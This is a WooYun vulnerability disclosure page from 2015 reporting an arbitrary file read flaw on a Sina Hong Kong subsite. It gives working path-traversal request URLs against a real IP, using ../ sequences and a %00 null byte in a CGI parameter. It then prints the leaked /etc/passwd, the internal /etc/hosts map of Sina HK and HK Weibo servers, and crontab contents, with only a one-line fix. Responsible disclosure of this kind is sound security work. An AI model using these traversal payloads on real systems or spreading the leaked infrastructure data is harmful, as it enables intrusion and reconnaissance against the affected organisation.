当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0122438

漏洞标题:新浪某分站任意文件读取漏洞

相关厂商:新浪

漏洞作者: 猪猪侠

提交时间:2015-06-24 12:28

修复时间:2015-08-08 13:36

公开时间:2015-08-08 13:36

漏洞类型:任意文件遍历/下载

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-24: 细节已通知厂商并且等待厂商处理中
2015-06-24: 厂商已经确认,细节仅向厂商公开
2015-07-04: 细节向核心白帽子及相关领域专家公开
2015-07-14: 细节向普通白帽子公开
2015-07-24: 细节向实习白帽子公开
2015-08-08: 细节向公众公开

简要描述:

新浪某分站任意文件读取漏洞

详细说明:

http://218.213.85.103/cgi-bin/api/sb/hottest_news.cgi?c=../../../../../../../../../../etc/passwd%00&_=1435037199895

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:999:999:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi-autoipd:x:100:156:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
mysql:x:1000:1000::/home/mysql:/sbin/nologin
web:x:99:99::/home/web:/bin/bash
www:x:80:99::/home/www:/sbin/nologin
ftp_sync:x:1201:99::/usr/home/ftp_sync:/bin/bash
sinamgt:x:1202:99::/usr/home/sinamgt:/bin/bash
szewai:x:1203:99::/home/szewai:/bin/bash
james:x:1204:99::/home/james:/bin/bash
kenneth:x:1205:99::/home/kenneth:/bin/bash
faiho:x:1206:99::/home/faiho:/bin/bash
ice:x:1207:99::/home/ice:/bin/bash
winnie:x:1208:99::/home/winnie:/bin/bash
kaden:x:1209:99::/home/kaden:/bin/bash
nick:x:1210:99::/home/nick:/bin/bash
ryan:x:1211:99::/home/ryan:/bin/bash
uuidd:x:101:158:UUID generator helper daemon:/var/lib/libuuid:/sbin/nologin
my3310:x:1212:1000::/data2/mysql3310:/sbin/nologin
couchbase:x:102:159:couchbase system user:/opt/couchbase:/bin/sh
apache:x:48:48:Apache:/var/www:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
memcached:x:103:160:Memcached daemon:/var/run/memcached:/sbin/nologin
tom:x:1213:99::/home/tom:/bin/bash
jeremy:x:1214:99::/home/jeremy:/bin/bash
heiyik:x:1215:99::/home/heiyik:/bin/bash
nagios:x:1216:1216::/home/nagios:/sbin/nologin

漏洞证明:

http://218.213.85.103/cgi-bin/api/sb/hottest_news.cgi?c=../../../../../../../../../../etc/hosts%00&_=1435037199895

# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1	sina235 localhost.localdomain localhost
::1		localhost6.localdomain6 localhost6
10.254.254.139 archive
10.254.254.183 system.sina.com.hk systemsnetmnt.sina.com.hk
10.254.254.75  systems.internal.sina.com.hk
# local platform 
# therefore we can use IP as domain
#127.0.0.1       wbp.internal.sina.com.hk
127.0.0.1       154.wbp.internal.sina.com.hk
10.254.254.155  155.wbp.internal.sina.com.hk
127.0.0.1       sme.sina.com.hk proxysme.sina.com.hk
127.0.0.1	soccer.sina.com.hk proxysoccer.sina.com.hk
127.0.0.1	eladies.sina.com.hk proxyeladies.sina.com.hk
127.0.0.1	travel.sina.com.hk proxytravel.sina.com.hk
10.254.254.224	proxyeladiesps.sina.com.hk
# slave server
#10.254.254.224	web-2.eladies.sina.com.hk
#10.254.254.224  web-2.travel.sina.com.hk
#10.254.254.224  web-2.sme.sina.com.hk
#10.254.254.224  web-2.sports.sina.com.hk
#10.254.254.222  yum.sina.com.hk
10.254.254.150	forum.eladies.hk
10.254.254.150	forum.eladies.sina.com.hk
10.254.254.76	www.eladies.hk
10.254.254.76	eladies.hk
# Channel
10.254.254.173	digital.sina.com.hk
10.254.254.173	travel.sina.com.hk
10.254.254.141	ent.sina.com.hk
10.254.254.148	game.sina.com.hk
10.254.254.215	news.sina.com.hk
10.254.254.136	eladies.sina.com.hk
10.254.254.148	basketball.sina.com.hk
10.254.254.127	finance.sina.com.hk
10.254.254.74	dictionary.sina.com.hk
10.254.254.135	sports.sina.com.hk
10.254.254.234	tv.sina.com.hk
# Common
10.254.254.172	weather.sina.com.hk
10.254.254.229	nw2.sina.com.hk
10.254.254.80	simg.sina.com.hk
10.254.254.182	img.sina.com.hk
10.254.254.177	rs.sinahk.net
10.254.254.175	rs2.sinahk.net
10.254.254.43	tool.sina.com.hk
10.254.254.43   tool43.sina.com.hk
10.254.254.141	site.search.sina.com.hk
#10.254.254.89	cap.internal.sina.com.hk
10.254.254.80	contentpool.sina.com.hk
10.254.254.181  gspsdb.sina.com.hk
10.254.254.233  tvdat.sina.com.hk
10.254.254.173	ads.sina.com.hk
10.254.254.140  ads.sina.com.hk
10.254.254.58	search.news.sina.com.hk
10.254.254.94	login.sina.com.hk
10.254.254.94	nz.sina.com.hk
10.254.254.149	soccer.sina.com.hk
10.254.254.141	ent.sina.com.hk
10.254.254.114	cs.sina.com.hk
10.254.254.183	pv.sina.com.hk
10.254.254.178	slide.sina.com.hk
10.254.254.178	admin.slide.sina.com.hk
10.254.254.61	hps.sina.com.hk
# System
10.254.254.75	ps.hk.weibo.com
10.254.254.75	admin.hk.weibo.com
10.254.254.183	psauth.sina.com.hk
# HK Weibo
10.254.254.50	hk.weibo.com
10.254.254.129	web-1.hk.weibo.com
10.254.254.130	web-2.hk.weibo.com
10.254.254.131	web-3.hk.weibo.com
10.254.254.16	db-m.hk.weibo.com
10.254.254.7	cron.hk.weibo.com
10.254.254.49	api.hk.weibo.com
#weibostatus
10.254.254.153  wbp.internal.sina.com.hk


SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/
# run-parts
01 * * * * root run-parts /etc/cron.hourly
02 4 * * * root run-parts /etc/cron.daily
22 4 * * 0 root run-parts /etc/cron.weekly
42 4 1 * * root run-parts /etc/cron.monthly
#######################################################
#Duplicity Backup
######################################################
30 5 * * * root /bin/sh /etc/duplicity.sh
########## Server setting #############
@daily root /usr/bin/rdate -su stdtime.gov.hk
25 11,16,21 * * mon-fri root /root/utility/update_useragent_exclude_list.sh
######################################
## Cleanup Session files
37 * * * * web /home/sinanet/ent/bin/crontab/clean_session.pl
1 4 * * * web find /home/sinanet/ent/temp/session/ps/* -amin +60 -exec rm -rf {} \;
# Clean outdated cache pag
1 3 * * * root perl /home/sinanet/ent/bin/ps/util/pcache.cgi > /dev/null 2>&1
###################################################################################
# eladies slave start
###################################################################################
## update nw_nclick and rsync the data file to master server
2 * * * * web perl /home/sinanet/ladies/bin/crontab/update_nw_nclick_201107.pl
5 * * * * web /usr/bin/rsync -avz  /home/sinanet/ladies/data/nw/ 10.254.254.224::home_sinanet_eladies/data/nw/
## weather
*/3 * * * * web perl /home/sinanet/ladies/bin/crontab/weather_asjs.pl
## Cleanup Session files
37 * * * * web /home/sinanet/ladies/bin/crontab/clean_session.pl
1 4 * * * web find /home/sinanet/ladies/temp/session/ps/* -amin +60 -exec rm -rf {} \;
# Clean outdated cache pag
1 3 * * * root perl /home/sinanet/ladies/bin/ps/util/pcache.cgi > /dev/null 2>&1
###################################################################################
# eladies slave end
###################################################################################

修复方案:

安全过滤

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-06-24 13:35

厂商回复:

感谢关注新浪安全,安全问题修复中。

最新状态:

暂无